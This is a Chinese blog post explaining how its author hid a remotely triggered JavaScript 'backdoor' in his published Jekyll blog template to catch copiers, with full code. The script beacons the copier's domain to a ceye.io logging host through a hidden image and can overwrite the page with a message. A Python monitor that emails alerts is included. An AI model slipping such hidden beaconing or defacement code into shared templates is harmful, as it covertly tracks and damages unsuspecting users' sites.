<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>我为何在博客模板留后门 · Chen's Blog</title> <meta name="description" content="前言"> <meta name="keywords" content="前言"> <link rel="icon" href="http://localhost:4000/assets/favicon.png"> <link rel="apple-touch-icon" href="http://localhost:4000/assets/touch-icon.png"> <link rel="stylesheet" href="http://localhost:4000/assets/core.css"> <link rel="canonical" href="http://localhost:4000/archives/2019-01-23/1"> <link rel="alternate" type="application/atom+xml" title="Chen's Blog" href="http://localhost:4000/feed.xml" /> <link href="/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" media="all" /> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?e4a42a371cc5994ee02b940034c29658"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script> window.giscusThemeConfig = { light: "light_protanopia", dark: "dark_tritanopia" }; </script> <script src="/assets/js/theme.js"></script> </head> <body> <button class="theme-toggle" id="themeToggle" aria-label="Switch Theme"> <!-- 太阳图标 (在深色模式显示) --> <svg id="icon-sun" viewBox="0 0 24 24"> <path d="M12 7c-2.76 0-5 2.24-5 5s2.24 5 5 5 5-2.24 5-5-2.24-5-5-5zM2 13h2c.55 0 1-.45 1-1s-.45-1-1-1H2c-.55 0-1 .45-1 1s.45 1 1 1zm18 0h2c.55 0 1-.45 1-1s-.45-1-1-1h-2c-.55 0-1 .45-1 1s.45 1 1 1zM11 2v2c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1s-1 .45-1 1zm0 18v2c0 .55.45 1 1 1s1-.45 1-1v-2c0-.55-.45-1-1-1s-1 .45-1 1zM5.99 4.58c-.39-.39-1.03-.39-1.41 0-.39.39-.39 1.03 0 1.41l1.06 1.06c.39.39 1.03.39 1.41 0s.39-1.03 0-1.41L5.99 4.58zm12.37 12.37c-.39-.39-1.03-.39-1.41 0-.39.39-.39 1.03 0 1.41l1.06 1.06c.39.39 1.03.39 1.41 0 .39-.39.39-1.03 0-1.41l-1.06-1.06zm1.06-10.96c.39-.39.39-1.03 0-1.41-.39-.39-1.03-.39-1.41 0l-1.06 1.06c-.39.39-.39 1.03 0 1.41s1.03.39 1.41 0l1.06-1.06zM7.05 18.36c.39-.39.39-1.03 0-1.41-.39-.39-1.03-.39-1.41 0l-1.06 1.06c-.39.39-.39 1.03 0 1.41s1.03.39 1.41 0l1.06-1.06z" /> </svg> <!-- 月亮图标 (在亮色模式显示) --> <svg id="icon-moon" viewBox="0 0 24 24" style="display: none"> <path d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.16,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.06,6.83,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z" /> </svg> </button> <aside class="logo"> <a href="http://localhost:4000/"> <img src="/assets/avatar.jpg" class="logo-avatar"> </a> <span class="logo-prompt code">Back to Index</span> </aside> <article> <h1 class="title">EvilChen</h1> <div class="divider"></div> <center> <a href="https://github.com/gh0stkey" target="_blank">Github</a> | <a href="https://twitter.com/VulkeyChen" target="_blank">X (Twitter)</a> | <a href="/about" target="_blank">About</a> | <a href="/friends" target="_blank">Friends</a> </center> <div class="divider"></div> </article> <div id="content"> <article> <div class="center"> <h1 class="title">我为何在博客模板留后门</h1> <time class="code">January 23, 2019</time> </div> <div class="divider"></div> <h1 id="前言">前言</h1> <p>在前段时间，我在我博客的模板上加入了后门（JavaScript），今天去除，并将思路简单的写出来。</p> <h2 id="为什么留后门呢">为什么留后门呢？</h2> <p><strong>起因</strong>：在前不久，团队官网模板就被偷走，很让人生气，抄袭者团队（以下简称为：A）没有打一声招呼就拿走了，但可笑的是A并没有在模板中修改JavaScript文件的外链引用，而是直接使用我们的JavaScript文件，所以简单的利用JS修改了一下其主页，提醒了下他，经过后来A主动与我联系并道歉，这件事情才结束～</p> <p>让我吃惊的是，这件事之后我发现我博客主题模板被拿走了，是的，不止一个哥们。</p> <p>我在我的博客项目中说明了<code class="language-plaintext highlighter-rouge">https://github.com/gh0stkey/gh0stkey.github.io</code></p> <blockquote> <p>个人博客 gh0st.cn 模版来自：https://github.com/heiswayi/the-plain 在原基础上增加了分页、网易云音乐播放器等功能（做了一些排版细节上的调整），拿之前告诉我下，谢谢！</p> </blockquote> <p>因为博客采用的是Github Pages + Jekyll，所以需要依赖于Github的进行托管，模板也就自然而然的可以直接<code class="language-plaintext highlighter-rouge">git clone</code>下来，模板也是我进行二次修改的，我觉得起码要尊重下作者，在博客主题或项目之类的进行说明，打声招呼也行，一声不吭的拿走是几个意思……</p> <p>有个好兄弟说过这样一段话，望周知：</p> <blockquote> <p>参考别人的研究成果，注明来源是基本素质，每个人都应该构建一个和谐积极向上的氛围，知道的人不愿意分享的原因就是不被别人认可，互相认可才能进步，现在理解一些师傅的苦衷了，挺悲哀的。请各位在以后的学习生涯上，尊重别人的分享，认可他人，互相感染才能进步。</p> </blockquote> <h1 id="关于后门">关于后门</h1> <p>我是一个“重度洁癖患者”，不喜欢自己的任何东西带上任何污点。包括对于在自己博客模板中加入后门，这对我来说是一件带有“大污点”的事情，所以思考了很久决定加上后门。</p> <h2 id="后门的构建">后门的构建</h2> <h3 id="javascript-后门">JavaScript 后门</h3> <p>模板后门选择的是JavaScript外链引用，而JavaScript的内容构建步骤如下：</p> <p><strong>1.判断是否是自己的域名（这个正则写的不严谨是可以被绕过的，例如：<code class="language-plaintext highlighter-rouge">gh0st.cn.bypass.cn</code>）：</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">host</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">host</span><span class="p">;</span> <span class="c1">//获取host</span>
<span class="kd">var</span> <span class="nx">reg</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="sr">/gh0st.cn/</span><span class="p">);</span> <span class="c1">//创建正则</span>
<span class="kd">var</span> <span class="nx">isok</span> <span class="o">=</span> <span class="nx">reg</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">host</span><span class="p">);</span> <span class="c1">//匹配结果：False\True</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nx">isok</span><span class="p">){</span><span class="c1">//判断</span>
	<span class="p">...</span><span class="nx">code</span>
<span class="p">}</span>
</code></pre></div></div> <p><strong>2.触发式：在一个Web服务上添加了isopen.txt这个文件，内容为NO则不触发，内容为YES则触发。（选择触发式的原因是因为博客上线有本地调试这一环节，如果在本地就触发了，那岂不是得不偿失，没有造成什么直接损害～）</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">xhr</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="c1">//创建XMLHttpRequest</span>
<span class="nx">xhr</span><span class="p">.</span><span class="nx">onreadystatechange</span><span class="o">=</span><span class="kd">function</span><span class="p">(){</span> <span class="c1">//请求成功则触发</span>
	<span class="k">if</span><span class="p">(</span><span class="nx">xhr</span><span class="p">.</span><span class="nx">responseText</span> <span class="o">==</span> <span class="dl">"</span><span class="s2">YES</span><span class="dl">"</span><span class="p">){</span> <span class="c1">//判断请求网站的内容是否是YES，如果是则进行下一步</span>
		<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">"</span><span class="s2">&lt;center&gt;&lt;h1&gt;Please tell me before using my template!By:[Vulkey_Chen]&lt;center&gt;&lt;h1&gt;</span><span class="dl">"</span><span class="p">);</span> <span class="c1">//页面内容修改</span>
	<span class="p">}</span>
<span class="p">}</span>
<span class="nx">xhr</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">http://webserver/isopen.txt</span><span class="dl">"</span><span class="p">,</span><span class="kc">true</span><span class="p">);</span> <span class="c1">//请求http://webserver/isopen.txt</span>
<span class="nx">xhr</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
</code></pre></div></div> <p><strong>3.既然选择了触发式的后门，那么就需要知道是谁偷了模板，这里利用的是<code class="language-plaintext highlighter-rouge">ceye.io</code>这个平台去记录“小偷”的域名和IP之类的东西：</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">img</span><span class="dl">"</span><span class="p">);</span> <span class="c1">//创建img标签</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://myblog.你的地址.ceye.io/fuck?domain=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">host</span><span class="p">;</span> <span class="c1">//设置img标签的src属性</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">stytle</span><span class="p">.</span><span class="nx">display</span><span class="o">=</span><span class="dl">"</span><span class="s2">none</span><span class="dl">"</span><span class="p">;</span> <span class="c1">//设置img标签的样式的display属性为none（表示这个将图片隐藏）</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">img</span><span class="p">);</span> <span class="c1">//在DOM节点(body)内加入img标签</span>
</code></pre></div></div> <p><strong>4.在博客模板的header.html中引用了外部的JS地址<code class="language-plaintext highlighter-rouge">&lt;script src="http://webserver/xxx.js"&gt;</code></strong></p> <p>完整代码如下：</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">host</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">host</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">reg</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="sr">/gh0st.cn/</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">isok</span> <span class="o">=</span> <span class="nx">reg</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">host</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nx">isok</span><span class="p">){</span>
	<span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">img</span><span class="dl">"</span><span class="p">);</span>
    <span class="nx">img</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://myblog.你的地址.ceye.io/fuck?domain=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">host</span><span class="p">;</span>
    <span class="nx">img</span><span class="p">.</span><span class="nx">stytle</span><span class="p">.</span><span class="nx">display</span><span class="o">=</span><span class="dl">"</span><span class="s2">none</span><span class="dl">"</span><span class="p">;</span>
    <span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">img</span><span class="p">);</span>
    <span class="kd">var</span> <span class="nx">xhr</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
    <span class="nx">xhr</span><span class="p">.</span><span class="nx">onreadystatechange</span><span class="o">=</span><span class="kd">function</span><span class="p">(){</span>
        <span class="k">if</span><span class="p">(</span><span class="nx">xhr</span><span class="p">.</span><span class="nx">responseText</span> <span class="o">==</span> <span class="dl">"</span><span class="s2">YES</span><span class="dl">"</span><span class="p">){</span>
        	<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">"</span><span class="s2">&lt;center&gt;&lt;h1&gt;Please tell me before using my template!By:[Vulkey_Chen]&lt;center&gt;&lt;h1&gt;</span><span class="dl">"</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="nx">xhr</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">http://webserver/isopen.txt</span><span class="dl">"</span><span class="p">,</span><span class="kc">true</span><span class="p">);</span>
    <span class="nx">xhr</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div> <h3 id="python-监控">Python 监控</h3> <p>利用<code class="language-plaintext highlighter-rouge">ceye.io</code>这个平台的API去实时监控，并且使用邮件发信通知。</p> <p>导入Python模块 &amp;&amp; 全局变量：</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">smtplib</span><span class="p">,</span><span class="n">requests</span><span class="p">,</span><span class="n">json</span><span class="p">,</span><span class="n">urlparse</span><span class="p">,</span><span class="n">sys</span>
<span class="kn">from</span> <span class="nn">email.MIMEText</span> <span class="kn">import</span> <span class="n">MIMEText</span>
<span class="kn">from</span> <span class="nn">email.Utils</span> <span class="kn">import</span> <span class="n">formatdate</span>
<span class="kn">from</span> <span class="nn">email.Header</span> <span class="kn">import</span> <span class="n">Header</span>

<span class="n">log</span> <span class="o">=</span> <span class="p">{}</span>
</code></pre></div></div> <p><strong>1.163邮件发信：</strong></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">send_mail</span><span class="p">(</span><span class="n">domain</span><span class="p">,</span><span class="n">ip</span><span class="p">):</span>
	<span class="n">smtpHost</span> <span class="o">=</span> <span class="s">'smtp.163.com'</span>
	<span class="n">smtpPort</span> <span class="o">=</span> <span class="s">'25'</span>
	<span class="n">fromMail</span> <span class="o">=</span> <span class="s">'邮箱账户'</span>
	<span class="n">toMail</span> <span class="o">=</span> <span class="s">'邮箱账户,收信方'</span>
	<span class="n">username</span> <span class="o">=</span> <span class="s">'邮箱账户'</span>
	<span class="n">password</span> <span class="o">=</span> <span class="s">'邮箱密码'</span>
	<span class="nb">reload</span><span class="p">(</span><span class="n">sys</span><span class="p">)</span>
	<span class="n">sys</span><span class="p">.</span><span class="n">setdefaultencoding</span><span class="p">(</span><span class="s">'utf8'</span><span class="p">)</span>

	<span class="n">subject</span> <span class="o">=</span> <span class="sa">u</span><span class="s">'博客监控到有人偷模板！'</span>
	<span class="n">body</span> <span class="o">=</span> <span class="sa">u</span><span class="s">"[小偷信息]</span><span class="se">\n</span><span class="s">Domain: {0} IP: {1}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">domain</span><span class="p">,</span><span class="n">ip</span><span class="p">)</span>

	<span class="n">encoding</span> <span class="o">=</span> <span class="s">'utf-8'</span>
	<span class="n">mail</span> <span class="o">=</span> <span class="n">MIMEText</span><span class="p">(</span><span class="n">body</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="n">encoding</span><span class="p">),</span><span class="s">'plain'</span><span class="p">,</span><span class="n">encoding</span><span class="p">)</span>
	<span class="n">mail</span><span class="p">[</span><span class="s">'Subject'</span><span class="p">]</span> <span class="o">=</span> <span class="n">Header</span><span class="p">(</span><span class="n">subject</span><span class="p">,</span><span class="n">encoding</span><span class="p">)</span>
	<span class="n">mail</span><span class="p">[</span><span class="s">'From'</span><span class="p">]</span> <span class="o">=</span> <span class="n">fromMail</span>
	<span class="n">mail</span><span class="p">[</span><span class="s">'To'</span><span class="p">]</span> <span class="o">=</span> <span class="n">toMail</span>
	<span class="n">mail</span><span class="p">[</span><span class="s">'Date'</span><span class="p">]</span> <span class="o">=</span> <span class="n">formatdate</span><span class="p">()</span>

	<span class="k">try</span><span class="p">:</span>
		<span class="n">smtp</span> <span class="o">=</span> <span class="n">smtplib</span><span class="p">.</span><span class="n">SMTP</span><span class="p">(</span><span class="n">smtpHost</span><span class="p">,</span><span class="n">smtpPort</span><span class="p">)</span>
		<span class="n">smtp</span><span class="p">.</span><span class="n">ehlo</span><span class="p">()</span>
		<span class="n">smtp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">username</span><span class="p">,</span><span class="n">password</span><span class="p">)</span>
		<span class="n">smtp</span><span class="p">.</span><span class="n">sendmail</span><span class="p">(</span><span class="n">fromMail</span><span class="p">,</span><span class="n">toMail</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">','</span><span class="p">),</span><span class="n">mail</span><span class="p">.</span><span class="n">as_string</span><span class="p">())</span>
		<span class="k">print</span> <span class="sa">u</span><span class="s">"邮件已发送，监控信息："</span>
		<span class="k">print</span> <span class="n">body</span>
	<span class="k">except</span> <span class="nb">Exception</span><span class="p">,</span><span class="n">e</span><span class="p">:</span>
		<span class="k">print</span> <span class="n">e</span>
		<span class="k">print</span> <span class="sa">u</span><span class="s">"发送失败，监控信息："</span>
		<span class="k">print</span> <span class="n">body</span>
	<span class="k">finally</span><span class="p">:</span>
		<span class="n">smtp</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div></div> <p><strong>2.ceye.io API调用获取信息，<a href="http://ceye.io/profile">个人中心</a>可以看见API TOKEN，<a href="http://ceye.io/api">API使用方法</a>：</strong></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">dnslog_monitor</span><span class="p">():</span>
	<span class="n">api</span> <span class="o">=</span> <span class="s">"http://api.ceye.io/v1/records?token=你的TOKEN&amp;type=http&amp;filter=myblog"</span>
	<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">api</span><span class="p">)</span>
	<span class="n">json_data</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">)</span>
	<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">json_data</span><span class="p">[</span><span class="s">'data'</span><span class="p">]:</span>
		<span class="n">query</span> <span class="o">=</span> <span class="n">urlparse</span><span class="p">.</span><span class="n">urlparse</span><span class="p">(</span><span class="n">i</span><span class="p">[</span><span class="s">'name'</span><span class="p">]).</span><span class="n">query</span>
		<span class="n">sb_domain</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">([(</span><span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">urlparse</span><span class="p">.</span><span class="n">parse_qs</span><span class="p">(</span><span class="n">query</span><span class="p">).</span><span class="n">items</span><span class="p">()])[</span><span class="s">'domain'</span><span class="p">]</span>
		<span class="n">sb_ip</span> <span class="o">=</span> <span class="n">i</span><span class="p">[</span><span class="s">'remote_addr'</span><span class="p">]</span>
		<span class="k">if</span> <span class="n">sb_domain</span> <span class="ow">in</span> <span class="n">log</span><span class="p">:</span>
			<span class="k">pass</span>
		<span class="k">else</span><span class="p">:</span>
			<span class="n">log</span><span class="p">[</span><span class="n">sb_domain</span><span class="p">]</span> <span class="o">=</span> <span class="n">sb_ip</span>
			<span class="n">send_mail</span><span class="p">(</span><span class="n">sb_domain</span><span class="p">,</span><span class="n">sb_ip</span><span class="p">)</span>
</code></pre></div></div> <p><strong>3.main函数：</strong></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
	<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
		<span class="n">dnslog_monitor</span><span class="p">()</span>
</code></pre></div></div> <h2 id="后门的运行">后门的运行</h2> <p>python脚本挂在服务器跑了一段时间，也发现了一个哥们又拿走了我的博客模板：</p> <p><img src="/images/2019-01-23/0.png" alt="oh,no" /></p> <p>让他”用”了一段时间，便将isopen.txt的内容改为了YES（即触发了后门），其后来也与我联系，并进行了和解。</p> <h1 id="写在最后的话">写在最后的话</h1> <p>也是因为“重度洁癖”，决定将模板后门去除。望君尊重技术、分享、作者，共勉！</p> </article> <div class="page-navigation code"> <a class="next" href="http://localhost:4000/archives/2019-03-12/1" title="NEXT: 记一次移动光猫（GM219-S）安全测试">&lt;&lt;</a> <span> &middot; </span> <a class="home" href="http://localhost:4000/" title="Back to Index">INDEX</a> <span> &middot; </span> <a class="prev" href="http://localhost:4000/archives/2018-12-08/1" title="PREV: iOS URL Schemes与漏洞的碰撞组合">&gt;&gt;</a> </div> <div class="comments"> <div id="giscus-container" class="giscus"></div> <script> (function() { const getTheme = () => { const savedTheme = localStorage.getItem('theme'); if (savedTheme) { return savedTheme; } const hour = new Date().getHours(); return (hour >= 6 && hour < 18) ? 'light' : 'dark'; }; const theme = getTheme(); const giscusTheme = theme === 'dark' ? 'dark_tritanopia' : 'light_protanopia'; const script = document.createElement('script'); script.src = "https://giscus.app/client.js"; script.setAttribute("data-repo", "gh0stkey/gh0stkey.github.io"); script.setAttribute("data-repo-id", "MDEwOlJlcG9zaXRvcnkzODc5NzEyMzU="); script.setAttribute("data-category", "Announcements"); script.setAttribute("data-category-id", "DIC_kwDOFx_4o84CyCUA"); script.setAttribute("data-mapping", "title"); script.setAttribute("data-strict", "0"); script.setAttribute("data-reactions-enabled", "0"); script.setAttribute("data-emit-metadata", "0"); script.setAttribute("data-input-position", "top"); script.setAttribute("data-lang", "zh-CN"); script.setAttribute("data-theme", giscusTheme); script.setAttribute("crossorigin", "anonymous"); script.async = true; document.getElementById('giscus-container').appendChild(script); })(); </script> </div> </div> <div class="footer"> <span class="block">&lt;/&gt; Copyright &copy; Chen's Blog (GH0ST.CN) 2016-2021</span> </div> <script src="/fancybox/lib/jquery-1.10.2.min.js"></script> <script type="text/javascript" src="/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script> <script> $(document).ready(function() { $("article img").each(function() { var strA = "<a style='text-decoration: none;' id='imgid' href='" + this.src + "'></a>"; $(this).wrapAll(strA); }); $(".block").html("&lt;/&gt; Copyright &copy; Chen's Blog (GH0ST.CN) 2016-" + (new Date()).getFullYear()); }); $("#imgid").fancybox({ openEffect : 'elastic', closeEffect : 'elastic', }); </script> </body> </html>
